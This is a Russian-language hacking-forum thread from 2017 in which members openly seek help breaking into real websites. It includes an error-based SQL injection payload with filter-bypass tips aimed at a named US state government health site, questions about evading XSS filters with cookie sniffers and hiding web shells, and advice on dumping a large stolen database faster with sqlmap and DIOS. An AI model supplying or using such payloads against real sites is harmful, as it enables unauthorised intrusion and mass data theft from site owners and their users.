HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #2001  
Старый 09.08.2017, 21:06
crlf
Guest
Сообщений: n/a
Провел на форуме:
169212

Репутация: 441
По умолчанию

Цитата:
Сообщение от kacergei  
kacergei said:

Ранее с таким не сталкивался, потому вопрос может быть очень глупым
)))
Выполняю это на удаленной машине, что бы сохранить файл на свой ПК (указывая его как удалённый)
"cat > vda_image"
я правильно понял что могу указать папку сохранения своего ПК, для примера: dd if=/dev/vda | ssh
root@xxx.xxx.xxx.xx
-p22 "cat > /root/folder_on_my_computer/vda_image_file"
Я верно понял?
P.S> как узнать предположительный размер конечного файла?
Дабы решить на какую удаленную лить (место не резиновое =) )
Да, можно указать любой путь на удалённой машине. Судя по df -h /dev/vda1имеет размер 30G, образ будет такого же размера. Можно ещё попутно жатьgzip-ом, размер должен быть меньше.
 
Ответить с цитированием

  #2002  
Старый 11.08.2017, 20:08
BabaDook
Guest
Сообщений: n/a
Провел на форуме:
238786

Репутация: 40
По умолчанию

Цветные, помогите

Код:
Code:
http://health.ri.gov/licenses/detail.php?id=248++1,2,3,4,5,6,7,8,9,10,11,12,13,14,15
 
Ответить с цитированием

  #2003  
Старый 11.08.2017, 21:10
cat1vo
Новичок
Регистрация: 12.08.2009
Сообщений: 1
Провел на форуме:
11937

Репутация: 0
По умолчанию

Цитата:
Сообщение от BabaDook  
BabaDook said:

Цветные, помогите
Код:
Code:
http://health.ri.gov/licenses/detail.php?id=248++1,2,3,4,5,6,7,8,9,10,11,12,13,14,15
Код:
Code:
detail.php?id=248=0 group by mid(version(),rand(0)|0)having min(0)-- -
Как вариант вывести через ошибку БД, но не забывай заключать оператор select в /*!select*/, там на него ругается!
 
Ответить с цитированием

  #2004  
Старый 11.08.2017, 21:14
BabaDook
Guest
Сообщений: n/a
Провел на форуме:
238786

Репутация: 40
По умолчанию

Цитата:
Сообщение от cat1vo  
cat1vo said:

Код:
Code:
detail.php?id=248=0 group by mid(version(),rand(0)|0)having min(0)-- -
Как вариант вывести через ошибку БД, но не забывай заключать оператор select в
/*!
select
*/
, там на него ругается!
Спасибо, а можешь любую таблицу вывести, а то я не оч понимаю этот синтекс, а так по твоему примеру буду пробовать разбираться. Спасибо.
 
Ответить с цитированием

  #2005  
Старый 11.08.2017, 21:26
t0ma5
Guest
Сообщений: n/a
Провел на форуме:
300820

Репутация: 90
По умолчанию

Цитата:
Сообщение от cat1vo  
cat1vo said:

Код:
Code:
detail.php?id=248=0 group by mid(version(),rand(0)|0)having min(0)-- -
Как вариант вывести через ошибку БД, но не забывай заключать оператор select в
/*!
select
*/
, там на него ругается!
там всё что после /**/ как будто не уходит в запрос

?id=248/**/werwer - валидная страница

?id=248=0 group by mid(/*!select(version())*/,rand(0)|0)having min(0)-- - - запрос падает
 
Ответить с цитированием

  #2006  
Старый 15.08.2017, 02:10
GYK
Guest
Сообщений: n/a
Провел на форуме:
3420

Репутация: 0
По умолчанию

Здравствуйте, я бы хотел узнать об XSS уязвимостях, а именно как их использовать, если стоит фильтр, просто алерт работает а вот более сложные скрипты со сниффером - фильтруются, и еще на счет сниффера, есть ли такие, которые работают, когда жертва просто видит картинку, и нажатия не требуется, я в этом плохо разбираюсь, также на счет шелка, есть ли беспалевные, просто на какой бы хостинг я бы не ставил, тут же блокируют, или шелл просто ее работает, может хостинги сеть, на которых они не садятся какие-то?
 
Ответить с цитированием

  #2007  
Старый 15.08.2017, 17:18
r1l
Guest
Сообщений: n/a
Провел на форуме:
4609

Репутация: 0
По умолчанию

Нашел жирный сайт, по после 200к(фул 1.3кк) строк слива очень падает скорость до нереальной

Что можно предпринять, что бы хоть как то заставить сливаться быстрее?
 
Ответить с цитированием

  #2008  
Старый 15.08.2017, 17:51
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

Цитата:
Сообщение от r1l  
r1l said:

Нашел жирный сайт, по после 200к(фул 1.3кк) строк слива очень падает скорость до нереальной
Что можно предпринять, что бы хоть как то заставить сливаться быстрее?
А чем сливаешь?
 
Ответить с цитированием

  #2009  
Старый 15.08.2017, 19:17
r1l
Guest
Сообщений: n/a
Провел на форуме:
4609

Репутация: 0
По умолчанию

Цитата:
Сообщение от Gorev  
Gorev said:

А чем сливаешь?
sqlmap как и всегда
 
Ответить с цитированием

  #2010  
Старый 15.08.2017, 19:56
cat1vo
Новичок
Регистрация: 12.08.2009
Сообщений: 1
Провел на форуме:
11937

Репутация: 0
По умолчанию

Цитата:
Сообщение от r1l  
r1l said:

Нашел жирный сайт, по после 200к(фул 1.3кк) строк слива очень падает скорость до нереальной
Что можно предпринять, что бы хоть как то заставить сливаться быстрее?
DIOS - Dump In One Shot
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ